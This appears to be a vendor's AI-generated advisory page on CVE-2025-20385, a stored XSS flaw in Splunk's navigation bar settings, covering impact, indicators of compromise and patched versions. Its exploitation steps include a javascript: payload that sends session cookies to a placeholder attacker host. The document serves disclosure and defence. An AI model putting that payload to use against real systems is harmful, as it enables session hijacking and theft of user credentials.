CVE-2025-20385
Splunk Enterprise vulnerability analysis and mitigation

Overview

CVE-2025-20385 is a stored Cross-Site Scripting (XSS) vulnerability in Splunk Enterprise and Splunk Cloud Platform, classified as CWE-79. A user holding the high-privilege admin_all_objects capability can craft a malicious payload via the href attribute of an anchor tag within a navigation bar collection, causing unauthorized JavaScript to execute in another user's browser. Affected versions include Splunk Enterprise below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117. The vulnerability was disclosed on December 3, 2025, with a CVSS v3.1 base score of 4.8 (Medium) per NIST NVD, and 2.4 (Low) per the CNA (Cisco/Splunk) (Splunk Advisory).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically within the navigation bar collection configuration in Splunk's web interface. An attacker with the admin_all_objects role can inject a malicious JavaScript payload into the href attribute of an anchor tag in a navigation bar collection; when another user navigates the Splunk interface and interacts with the affected navigation element, the injected script executes in their browser context. This is a stored XSS variant, meaning the payload persists server-side and triggers on subsequent page loads without further attacker interaction. Exploitation requires high privileges (the admin_all_objects capability) and user interaction from a victim, limiting the attack surface (Splunk Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views the compromised navigation bar, potentially leading to session cookie theft, credential harvesting, unauthorized actions performed on behalf of the victim, and limited data exposure. The confidentiality and integrity impacts are rated low, and there is no direct availability impact. Because the attack targets other users' browser sessions rather than the server directly, lateral movement within Splunk (e.g., accessing data or dashboards as the victim) is a realistic secondary consequence (Splunk Advisory).

Exploitability

There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the disclosure date (Splunk Advisory). The EPSS score is approximately 0.033%, reflecting a very low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The requirement for the admin_all_objects high-privilege role significantly constrains the exploitable attack surface.

Exploitation steps

  1. Gain high-privilege access: Obtain or compromise a Splunk account with the admin_all_objects capability, either through credential theft, privilege escalation, or insider access.
  2. Navigate to navigation bar configuration: Log into the Splunk web interface and access the navigation bar collection editor (typically under Settings > User Interface > Navigation menus).
  3. Inject malicious payload: Edit an anchor tag's href attribute within a navigation bar collection to include a JavaScript URI payload, such as javascript:document.location='https://attacker.com/steal?c='+document.cookie.
  4. Save the configuration: Commit the modified navigation bar, causing the malicious payload to be stored server-side and rendered for all users who load the affected Splunk interface.
  5. Wait for victim interaction: When a target user loads the Splunk interface and interacts with the poisoned navigation element, the injected JavaScript executes in their browser context, enabling session cookie theft or other unauthorized actions (Splunk Advisory).

Indicators of compromise

  • Logs: Splunk audit logs showing unexpected modifications to navigation bar collections by accounts with admin_all_objects privileges; review _audit index for action=edit events on navigation objects.
  • Network: Outbound browser requests from Splunk users to unexpected external domains shortly after loading the Splunk UI, potentially carrying session tokens or cookies as query parameters.
  • File System: Unexpected changes to Splunk navigation configuration files (e.g., default.xml or local.xml under $SPLUNK_HOME/etc/apps/<app>/default/data/ui/nav/) containing javascript: URI schemes in href attributes.
  • Process/Behavior: Unusual JavaScript execution errors or redirects logged in browser developer consoles when accessing the Splunk web interface.

Mitigation and workarounds

Splunk has released patched versions addressing this vulnerability: Splunk Enterprise 10.0.2, 9.4.6, 9.3.8, and 9.2.10; Splunk Cloud Platform 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117. Organizations should upgrade to these versions immediately. As interim mitigations, limit and audit accounts holding the admin_all_objects capability, implement strict input validation for navigation bar configurations, and review user permissions to enforce least privilege (Splunk Advisory).

Additional resources


SourceThis report was generated using AI

Related Splunk Enterprise vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-76352HIGH8.8
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesAug 19, 2026
CVE-2026-76351HIGH8.8
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesAug 19, 2026
CVE-2026-76354HIGH8.1
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesAug 19, 2026
CVE-2026-76355HIGH7.5
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:*
NoYesAug 19, 2026
CVE-2026-76353MEDIUM5.4
  • Splunk Enterprise logoSplunk Enterprise
  • cpe:2.3:a:splunk:splunk
NoYesAug 19, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management